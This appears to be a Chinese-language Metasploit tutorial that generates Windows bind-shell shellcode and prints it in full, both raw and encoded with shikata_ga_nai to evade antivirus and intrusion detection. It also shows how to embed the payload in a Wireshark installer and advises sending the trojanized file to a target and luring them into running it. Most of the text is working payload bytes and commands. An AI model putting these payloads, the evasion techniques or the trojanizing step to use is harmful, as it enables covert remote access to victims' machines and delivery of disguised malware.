msf > use payload/windows/shell_bind_tcp #使用该模块绑定(监听)本机的一个TCP连接端口 msf payload(windows/shell_bind_tcp) > generate #通过generate生成16进值的payload,默认以rube语言编写的 # windows/shell_bind_tcp - 328 bytes # http://www.metasploit.com # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process buf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + "\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" + "\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" + "\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" + "\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" + "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" + "\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" + "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" + "\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" + "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" + "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" + "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" + "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" + "\x6f\x6a\x00\x53\xff\xd5" |
由 generate 产生的shellcode是完全可以运行的,但是其中包含一些null空字符,在一些程序进行解析时,这些空字符会被认为是字符串的结束,从而使得代码在完整执行之前被截断而终止运行。简单来说,这些\x00 ,\ff和\xff字符会破坏攻击负荷。
另外,在网络上明文传输的shellcode很可能被入侵检测系统和杀毒软件所识别,为了解决这一问题,Metasploit的开发提供MSF编码器,可以帮助渗透测试者通过对原始攻击载荷进行编码的方式,来避免坏字符,以及逃避杀毒软件和IDS的检测。
我们使用generate -b '\x00’将\x00坏字符进行编码避免在执行的过程中被截断而终止.
msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff' # windows/shell_bind_tcp - 355 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai #表示使用此Encoder对坏字符进行编码,generate会自动选择Encoder # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process buf = "\xbd\x43\x0e\x07\xaa\xda\xd0\xd9\x74\x24\xf4\x58\x29\xc9" + "\xb1\x53\x31\x68\x12\x03\x68\x12\x83\xab\xf2\xe5\x5f\xd7" + "\xe3\x68\x9f\x27\xf4\x0c\x29\xc2\xc5\x0c\x4d\x87\x76\xbd" + "\x05\xc5\x7a\x36\x4b\xfd\x09\x3a\x44\xf2\xba\xf1\xb2\x3d" + "\x3a\xa9\x87\x5c\xb8\xb0\xdb\xbe\x81\x7a\x2e\xbf\xc6\x67" + "\xc3\xed\x9f\xec\x76\x01\xab\xb9\x4a\xaa\xe7\x2c\xcb\x4f" + "\xbf\x4f\xfa\xde\xcb\x09\xdc\xe1\x18\x22\x55\xf9\x7d\x0f" + "\x2f\x72\xb5\xfb\xae\x52\x87\x04\x1c\x9b\x27\xf7\x5c\xdc" + "\x80\xe8\x2a\x14\xf3\x95\x2c\xe3\x89\x41\xb8\xf7\x2a\x01" + "\x1a\xd3\xcb\xc6\xfd\x90\xc0\xa3\x8a\xfe\xc4\x32\x5e\x75" + "\xf0\xbf\x61\x59\x70\xfb\x45\x7d\xd8\x5f\xe7\x24\x84\x0e" + "\x18\x36\x67\xee\xbc\x3d\x8a\xfb\xcc\x1c\xc3\xc8\xfc\x9e" + "\x13\x47\x76\xed\x21\xc8\x2c\x79\x0a\x81\xea\x7e\x6d\xb8" + "\x4b\x10\x90\x43\xac\x39\x57\x17\xfc\x51\x7e\x18\x97\xa1" + "\x7f\xcd\x02\xa9\x26\xbe\x30\x54\x98\x6e\xf5\xf6\x71\x65" + "\xfa\x29\x61\x86\xd0\x42\x0a\x7b\xdb\x7d\x97\xf2\x3d\x17" + "\x37\x53\x95\x8f\xf5\x80\x2e\x28\x05\xe3\x06\xde\x4e\xe5" + "\x91\xe1\x4e\x23\xb6\x75\xc5\x20\x02\x64\xda\x6c\x22\xf1" + "\x4d\xfa\xa3\xb0\xec\xfb\xe9\x22\x8c\x6e\x76\xb2\xdb\x92" + "\x21\xe5\x8c\x65\x38\x63\x21\xdf\x92\x91\xb8\xb9\xdd\x11" + "\x67\x7a\xe3\x98\xea\xc6\xc7\x8a\x32\xc6\x43\xfe\xea\x91" + "\x1d\xa8\x4c\x48\xec\x02\x07\x27\xa6\xc2\xde\x0b\x79\x94" + "\xde\x41\x0f\x78\x6e\x3c\x56\x87\x5f\xa8\x5e\xf0\xbd\x48" + "\xa0\x2b\x06\x78\xeb\x71\x2f\x11\xb2\xe0\x6d\x7c\x45\xdf" + "\xb2\x79\xc6\xd5\x4a\x7e\xd6\x9c\x4f\x3a\x50\x4d\x22\x53" + "\x35\x71\x91\x54\x1c" |
当然也可以通过generate -e自行指定Encoder对坏字符进行编码
msf payload(windows/shell_bind_tcp) > generate -e x86/nonupper |
generate的参数列表:
-b:指定对坏字符进行过滤编码
-t:指定payload的输出格式,如exe格式,py格式,默认是ruby语言编写的16进值编码的形式
-e:指定某个Encoder进行编码,不指定的话,系统会自行选择适合的Encoder
-i:后面跟编码迭代次数,也就是编码的次数
-k:不产生新的进程,只产生线程,提交隐蔽性.
-x:将payload穿插进入可执行的模板中(可以理解为应用程序)这样只要该应用程序运行,payload即也将会运行.
-f:指定输出的位置
举个例子:
我们在wireshark.exe程序中插入payload并命名为1.exe
msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /root/Wireshark-win64-2.6.3.exe -f /root/1.exe [*] Writing 628224 bytes to /root/1.exe... |
然后可以将wireshark打包发送给目标主机使用者,诱使其点击,然后便可以在本地使用远程工具连接目标主机啦
NOP:no-operation/Next operation(无任何操作):当程序执行到NOP指令的时候,CUP会自动滑到当前字节的下一个字节,如果下一个字节也是NOP,便会一直往下滑
使用generate -t c:指定使用c语言编写此payload
msf payload(windows/shell_bind_tcp) > generate -t c /* * windows/shell_bind_tcp - 328 bytes * http://www.metasploit.com * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, * EXITFUNC=process */ unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97" "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0" "\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb" "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"; |
上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。